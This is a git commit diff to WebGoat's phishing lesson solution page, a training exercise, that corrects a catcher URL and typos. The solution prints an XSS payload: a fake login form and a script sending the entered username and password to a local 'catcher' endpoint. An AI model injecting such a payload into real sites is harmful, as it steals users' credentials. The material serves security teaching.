dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fixed URL, typos

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@418 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mariethuynh 2010-03-23 00:31:43 +00:00
parent 26a90ec2be
commit 39d99eb5d7
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
src/main/webapp/lesson_solutions/Phishing.html
View File

@ -18,17 +18,17 @@ hard for a victim to determinate that the content is malicious.
<p><b>General Goal(s):</b><br/> <p><b>General Goal(s):</b><br/>
The user should be able to add a form asking for username The user should be able to add a form asking for username
and password. On submit the input should be sent to and password. On submit the input should be sent to
http://localhostcatcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName http://localhost/webgoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
</p> </p>
<b>Solution:</b><br/> <b>Solution:</b><br/>
With XSS it is possible to add further elements to an exsisting Page. With XSS it is possible to add further elements to an existing Page.
This solution consists of two parts you have to combine: This solution consists of two parts you have to combine:
<ul> <ul>
<li>A form the victim has to fill in</li> <li>A form the victim has to fill in</li>
<li>A script which reads the form and sends the gathered information to the attacker</li> <li>A script which reads the form and sends the gathered information to the attacker</li>
</ul> </ul>
A Form whith username and password could look like this:<br/> A Form with username and password could look like this:<br/>
<p> <p>
&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3 &lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; &gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
@ -40,19 +40,19 @@ Now you need a script:
<p> <p>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." &lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value); User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhostcatcher?PROPERTY=yes&amp;user=&quot;+ XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;} document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt; &lt;/script&gt;
</p> </p>
<p> <p>
This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/> This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
The last step is to put things together. Add a Button to the form which The last step is to put things together. Add a Button to the form which
calls the script. You can reach this wicht the onclick="myFunction" handler. calls the script. You can reach this with the onclick="myFunction" handler.
<p> <p>
The final String looks like this:<br/> The final String looks like this:<br/>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen. &lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value); User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhostcatcher?PROPERTY=yes&amp;user=&quot;+ XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;} document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3 &lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; &gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;